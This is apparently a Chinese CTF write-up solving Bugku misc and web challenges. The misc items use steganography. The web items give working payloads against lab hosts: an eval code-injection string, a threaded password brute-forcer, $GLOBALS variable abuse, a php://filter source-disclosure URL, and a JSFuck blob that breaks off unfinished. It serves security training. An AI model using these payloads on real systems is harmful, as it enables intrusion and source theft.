简介

这些题是去年10月和花费巨资在Bugku作者那买来,里面的题有些质量挺高,等后续我还会继续更新

Misc

Misc1

附件:

在网上找了一个GIF图片分离工具,下载链接:蓝奏云。分离图片后仔细观察图片,发现图片有红蓝绿三种关键颜色,且每显示8次红绿灯就后就显示一次黄灯,盲猜是一串flag的二进制形式,写个脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
import os
os.chdir(r'C:\Users\Jason\Desktop\img')
green = open('IMG00000.bmp','rb').read()
red = open('IMG00002.bmp','rb').read()
yellow = open('IMG00016.bmp','rb').read()
count = 0
flag = ''
last_flag = ''

list = [green,red,yellow] #绿色表示0,红色表示1

for i in range(1168):
test = open('IMG' + str(count).zfill(5) + '.bmp','rb').read()
count += 1
print('[+]正在打开第{}张图片'.format(i))
try:
number = list.index(test) #index方法,返回对应值在列表中排名的位数(第几位)
flag += str(number)
except:
pass
flag = flag.replace('2','\n') #将黄色替换为空格
with open('result.txt','w') as f:
f.write(str(flag))

'''将二进制数字转换为字符'''
total = open('result.txt','r').readlines()
for i in range(len(total)):
flag = chr(int(total[i],2)) #int(str,2)将str转换为2进制
last_flag += str(flag)
print(last_flag)

拿到flag

1
flag{Pl34s3_p4y_4tt3nt10n_t0_tr4ff1c_s4f3ty_wh3n_y0u_4r3_0uts1d3}

Misc2

附件:24.bmp

下载图片,用winhex打开发现文件头缺失,但并不是我们随便加个文件头就可以了的,因为并不是所有bmp的文件头都是一样的。要补全bmp文件头,我们通常要知道文件大小,图片宽高,像素位面数

bmp教程参考@ 浅_若:BMP视频解析

未修改前的文件头

经过修改后的文件头

范围 所占字节 简介
00-01 2 424D(文件头固定值)
02-05 4 图片大小字节数(通过文件属性获取),这里的文件大小位202800字节,转换16进制为31830
0A-0D 4 文件头到数据区的偏移量(单色位为62 ,16色位为118,24色位为54,256色位为1078)
0E-0F 2 文件头长度,通常为0028
12-15 4 图片宽度
16-19 4 图片高度
1A-1B 2 位图位面数,固定值为0001
1C-1D 4 像素相位数。01000000 为单色位;04000000 为16色位;08000000 为256色位;18000000 为24色位

修改文件头后保存,用能解析bmp图片的软件打开,我是直接拉到浏览器打开的

Misc3

附件:

一张jpg图片,老样子,先复制到kali里面,用binwalk命令发现里面有一个隐藏的zip文件

1
2
3
4
5
6
7
8
9
10
11
12
root@kali:~/demo# binwalk Welcome_.jpg 

DECIMAL HEXADECIMAL DESCRIPTION
--------------------------------------------------------------------------------
0 0x0 JPEG image data, JFIF standard 1.01
30 0x1E TIFF image data, big-endian, offset of first image directory: 8
4444 0x115C Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:Description rdf:about="uuid:faf5bdd5-ba3d-11da-ad31-d33d75182f1b" xmlns:dc="http://p
4900 0x1324 Unix path: /www.w3.org/1999/02/22-rdf-syntax-ns#"><rdf:li xml:lang="x-default">hint:</rdf:li></rdf:Alt>
52516 0xCD24 Zip archive data, at least v1.0 to extract, compressed size: 6732, uncompressed size: 6732, name: flag.rar
59264 0xE780 End of Zip archive
147852 0x2418C End of Zip archive

遂用 binwalk -e 命令将该图片分解,分解后发现一个需要密码的rar后缀压缩包和一个提示.jpg

根据提示我们可以提取出关键字”国王”,”女神”和”梅花J”,其首字母分别为”K”,”Q”,”J”。”K”,”Q”,”J”分别又对应数字 7,8,1,所以密码可能是这三个数字的任意形式组合,这里我直接用ARCHPR爆破得到密码为871。

输入密码解压后得到一张3.jpg,用记事本打开,发现一串base64加密后的flag,解密后得到真正的flag

1
flag{y0u Are a h@cker!}

Misc4

附件:zip

下载之后手动补全扩展名.zip,解压后发现一个哆啦A梦.jpg和一个hint.txt,下面是hint.txt的内容

1
图片好像少了点什么?

主要的线索在那个哆啦A梦.jpg之中,看到了那个哆啦A梦.jpg,我首先想到的是哆啦A梦在投篮却没有篮球框?应该是修改图片宽高之类的。将哆啦A梦.jpg拉到 kali 进行分析,发现哆啦A梦.jpg里面隐藏了一张png图片,故用 foremost 命令将图片分离出来,多出一张未显示完全的二维码

用winhex打开,发现尺寸不对,要调整图片的高度,257转换16进制为0101,将搜索出来的第一个0101改成012C,得到一张完整的二维码,扫描之后得到一串字符串,base64解密该字符串之后

拿下flag

1
flag{Ctf_2018_very_good}

Misc5

附件:CTF2.zip

描述:找到key其实很简单

解压后发现有一个 flag 文件夹,里面有500个txt文件,根据题目意思应该是要我们在这500个txt文件中找到key,遂把500个txt文件拉到 kali 使用 strings 命令拿到 key

1
2
root@kali:~/demo/flag# strings * | grep key{
bkey{fe9ff627da72364a}@e`f`>"R Z*Wn

Misc6

附件:zip

下载文件,手动补全扩展名,解压后得到一个wenjian.rar,以及一个压缩包密码.txt,先打开压缩包密码.txt,发现是一张base64的图片,用站长工具还原图片之后得到解压密码

1
data:image/png;base64,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

得到文件解压密码之后,解压wenjian.rar,发现里面有159张二维码,我们要找的key应该就在其中之一里面,不过我们是不可能是一个个手工扫的。python2有个zbar模块,专门用来进行扫描二维码操作的,在python3被打包成了一个接口,叫pyzber,不过只要能用就行。我的环境是 windows 的 python3.9,首先下载相应模块

1
2
pip install Pillow
pip install pyzbar

然后再写个脚本,开跑

1
2
3
4
5
6
7
8
9
10
11
12
from PIL import Image
from pyzbar.pyzbar import decode
import os
flag = ''
os.chdir(r'C:\Users\Jason\Desktop\demo\题目\wenjian') #二维码文件所在目录
for i in range(160):
f = Image.open('{}.png'.format(i))
laste = decode(f)
for result in laste:
data = result.data.decode('utf-8')
flag += data
print(flag)

跑出来一串二进制数字,利用在线工具转换之后获得flag

1
flag{QRcode1sUseful}

Misc7

附件:stego100.wav

工具:cooleditpro

听到2分15秒的时候有滴滴~滴滴的声音,估计是摩斯电码(根据目前所学过的,能嵌套在音频的只有摩斯电码了)。用 cooleditpro 打开该音频,看到摩斯电码以音频的波长形式显现出来

将摩斯电码记录下来,对照摩斯电码对照表解码,最后得到一串字符串,那就是flag

1
5BC925649CB0188F52E617D70929191C

Web

Web1

文件包含漏洞的题目,eval()这个函数的作用是字符串里面的php代码按正常的php代码被执行

1
2
3
4
5
6
<?php
include "flag.php";
$a = @$_REQUEST['hello']; //$_REQUEST:可以获取GET和POST请求提交的数据
eval( "var_dump($a);"); //eval中是要执行的代码段,var_dump()返回变量的数据类型
show_source(__FILE__);
?>

构造payload

1
http://192.168.176.235:1020/?hello=1);show_source("flag.php");//

相当于

1
eval("var_dump(1);show_source("flag.php");")

拿下flag

1
2
3
4
5
6
7
8
9
10
int(1) <?php
$flag = 'Too Young Too Simple';
# echo $flag;
# flag{ccd234c9-c022-4ce3-8a62-e56374e3324f};
?> <?php
include "flag.php";
$a = @$_REQUEST['hello'];
eval( "var_dump($a);");
show_source(__FILE__);
?>

Web2

爆破密码的题

写了个脚本,要用到线程锁

线程锁(threading.lock),我们都知道在多线程中线程是共用资源的,如果多个线程修改同一变量,会导致数据紊乱,比如说:两个人都想喝可乐,但冰箱里只有一瓶可乐了,两个人为此一直在争执,导致谁也喝不到冰箱那瓶冰阔乐。所以引入了线程锁的概念,线程锁每次只允许一个线程通过,通常锁住(acquire())和解锁(release)是成对调用的。线程锁又分为互斥锁(lock)与递归锁(RLock),互斥锁与递归锁区别在于互斥锁如果多次锁变量可能会导致死锁(又称线程竞争),我们要避免死锁这种情况所以我们在要需要多次调用线程锁的时候尽量使用递归锁(RLock)。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
import threading,requests
lock = threading.RLock()
pass_correct = False
pwd = 0

def main():
global pwd,pass_correct
while True:
if pass_correct == True:
break
else:
password = str(pwd).zfill(5)
data = {"pwd":password}
lock.acquire()
pwd += 1
lock.release()
r = requests.post('http://192.168.1.98:1021/?yes',data=data)
r.encoding = 'utf-8'
try:
r.text.index("密码不正确,请重新输入")
print("[-] {} is incorrect".format(password))
except:
print('[+]The key is {}'.format(password))
pass_correct = True

t = threading.Thread(target=main)

拿到flag

1
flag{bugku-baopo-hah}

Web3

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
源码如下:

flag In the variable ! <?php

error_reporting(0);
include "flag1.php";
highlight_file(__file__);
if(isset($_GET['args'])){
$args = $_GET['args'];
if(!preg_match("/^\w+$/",$args)){
die("args error!");
}
eval("var_dump($$args);"); //调用两次。$($argc)
}
?>

又是一个文件包含漏洞,题目说flag储存在变量里,但是注意,$$args为可变变量

网上查了下可变变量,然后再了解了一下部分函数的作用

isset: 用于检测变量是否设置且非Null
preg_match: 用于执行一个正则表达式
/w 相当于[A-Za-z0-9_],^ 为匹配字符串的开始位置,$ 为匹配字符串的结束位置,+表明能够有一个或多个\w

PHP 将所有全局变量存储在一个名为 $GLOBALS的数组中($GLOBAL又称超全局变量,),因此构造payload:?args=GLOBALS即可爆出所有args,包括flag在内。即$GLOBALS = $args:GLOBAL

1
payload:http://192.168.1.98:1023/args=GLOBALS

Web4

这题主要考的是php伪协议,记得竞赛的时候有过这个

关于php://filter/:

解释:php://filter是一种元封装器,设计用于”数据流打开”时的”筛选过滤”应用,对本地磁盘文件进行读写。简单来讲就是可以在执行代码前将代码换个方式读取出来,只是读取,不需要开启allow_url_include
php://filter/resource=<待过滤的数据流>(就是文件的路径)
php://filter/read=<读链需要应用的过滤器列表>(就是具体的操作)

用法:

?file=php://filter/convert.base64-encode/resource=xxx.php
?file=php://filter/read/convert.base64-encode/resource=xxx.php 效果与上面那个是一样的
基本原理就是在php://filter执行xxx.php前将xxx.php进行base64编码,掩盖了<?php,导致xxx.php无法直接输出,输出的是base64编码后的内容

1
payload:http://192.168.1.98:1023/index.php?file=php://filter/read/convert.base64-encode/resource=index.php

base64解码,得到flag

1
flag{edulcni_elif_lacol_si_siht}

Web5

??送分题!?

Web6

这题似乎要post请求才行

人生苦短,我用python

1
2
3
4
5
import requests
post_data = {'what':'flag'}
r = requests.post('http://192.168.1.98:1025/',data=post_data)
r.encoding = 'utf-8'
print(r.text)

拿下flag

1
flagflag{bugku_get_ssseint67se}

Web7

这是一道jother解码的题

随便输入点什么,发现有错别字:”在”。打开F12,康康源代码

然后发现这么一串东西,我仔细一看。啊,是jother编码过的,直接复制粘贴到控制台(这里是谷歌浏览器的控制台)

1
([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+!+[]]]+(+(!+[]+!+[]+!+[]+[!+[]+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]+!+[]])+(+(+!+[]+[+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])[+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[])[+[]]+(+(!+[]+!+[]+[+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]](!+[]+!+[]+[+!+[]])+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+!+[]]]+([][[]]+[])[+[]]+([][[]]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(![]+[])[+!+[]]+(+(!+[]+!+[]+[+!+[]]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(+![]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([![]]+[][[]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(+![]+[![]]+([]+[])[([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[